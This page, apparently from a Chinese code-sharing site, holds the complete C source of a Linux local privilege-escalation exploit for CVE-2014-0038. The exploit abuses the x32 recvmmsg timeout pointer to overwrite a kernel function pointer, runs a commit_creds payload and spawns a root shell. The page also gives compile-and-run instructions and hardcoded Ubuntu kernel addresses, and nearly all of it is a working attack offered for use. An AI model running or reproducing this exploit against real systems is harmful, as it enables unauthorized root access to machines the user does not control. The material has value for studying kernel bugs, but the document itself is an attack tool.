扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 |
/* * Local root exploit for CVE-2014-0038. * * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c * * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer * passed from userspace. * * Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg, * if the original byte at that address is known it can be overwritten * with known data. * If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00. * * Restrictions: The first long at the passed address (tv_sec) has to be positive * and the second long (tv_nsec) has to be smaller than 1000000000. * * Overview: Target the release function pointer of the ptmx_fops structure located in * non initialized (and thus writable) kernel memory. Zero out the three most * significant bytes and thus turn it into a pointer to an address mappable in * user space. * The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec * is valid). * Open /dev/ptmx, close it and enjoy. * * Not very beautiful but should be fairly reliable if symbols can be resolved. * * Tested on Ubuntu 13.10 * * gcc timeoutpwn.c -o pwn && ./pwn * * Written by saelo */ #define _GNU_SOURCE #include <netinet/ip.h> #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/wait.h> #include <sys/mman.h> #define __X32_SYSCALL_BIT 0x40000000 #undef __NR_recvmmsg #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) #define BUFSIZE 200 #define PAYLOADSIZE 0x2000 #define FOPS_RELEASE_OFFSET 13*8 /* * Adapt these addresses for your need. * see /boot/System.map* or /proc/kallsyms * These are the offsets from ubuntu 3.11.0-12-generic. */ #define PTMX_FOPS 0xffffffff81fb30c0LL #define TTY_RELEASE 0xffffffff8142fec0LL #define COMMIT_CREDS0xffffffff8108ad40LL #define PREPARE_KERNEL_CRED 0xffffffff8108b010LL typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); /* * Match signature of int release(struct inode*, struct file*). * * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz */ int __attribute__((regparm(3))) kernel_payload(void* foo, void* bar) { _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;// restore pointer commit_creds(prepare_kernel_cred(0)); return -1; } /* * Write a zero to the byte at then given address. * Only works if the current value is 0xff. */ void zero_out(long addr) { int sockfd, retval, port, pid, i; struct sockaddr_in sa; char buf[BUFSIZE]; struct mmsghdr msgs; struct iovec iovecs; srand(time(NULL)); port = 1024 + (rand() % (0x10000 - 1024)); sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd == -1) { perror("socket()"); exit(EXIT_FAILURE); } sa.sin_family= AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port= htons(port); if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { perror("bind()"); exit(EXIT_FAILURE); } memset(&msgs, 0, sizeof(msgs)); iovecs.iov_base = buf; iovecs.iov_len= BUFSIZE; msgs.msg_hdr.msg_iov= &iovecs; msgs.msg_hdr.msg_iovlen = 1; /* * start a seperate process to send a udp message after 255 seconds so the syscall returns, * but not after updating the timout struct and writing the remaining time into it. * 0xff - 255 seconds = 0x00 */ printf("clearing byte at 0x%lx\n", addr); pid = fork(); if (pid == 0) { memset(buf, 0x41, BUFSIZE); if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { perror("socket()"); exit(EXIT_FAILURE); } sa.sin_family= AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port= htons(port); printf("waiting 255 seconds...\n"); for (i = 0; i < 255; i++) { if (i % 10 == 0) printf("%is/255s\n", i); sleep(1); } printf("waking up parent...\n"); sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa)); exit(EXIT_SUCCESS); } else if (pid > 0) { retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr); if (retval == -1) { printf("address can't be written to, not a valid timespec struct\n"); exit(EXIT_FAILURE); } waitpid(pid, 0, 0); printf("byte zeroed out\n"); } else { perror("fork()"); exit(EXIT_FAILURE); } } int main(int argc, char** argv) { long code, target; int pwn; /* Prepare payload... */ printf("preparing payload buffer...\n"); code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0); memset((void*)code, 0x90, PAYLOADSIZE); code += PAYLOADSIZE - 1024; memcpy((void*)code, &kernel_payload, 1024); /* * Now clear the three most significant bytes of the fops pointer * to the release function. * This will make it point into the memory region mapped above. */ printf("changing kernel pointer to point into controlled buffer...\n"); target = PTMX_FOPS + FOPS_RELEASE_OFFSET; zero_out(target + 7); zero_out(target + 6); zero_out(target + 5); /* ... and trigger. */ printf("releasing file descriptor to call manipulated pointer in kernel mode...\n"); pwn = open("/dev/ptmx", 'r'); close(pwn); if (getuid() != 0) { printf("failed to get root :(\n"); exit(EXIT_FAILURE); } printf("got root, enjoy :)\n"); return execl("/bin/bash", "-sh", NULL); } |
体验盒子
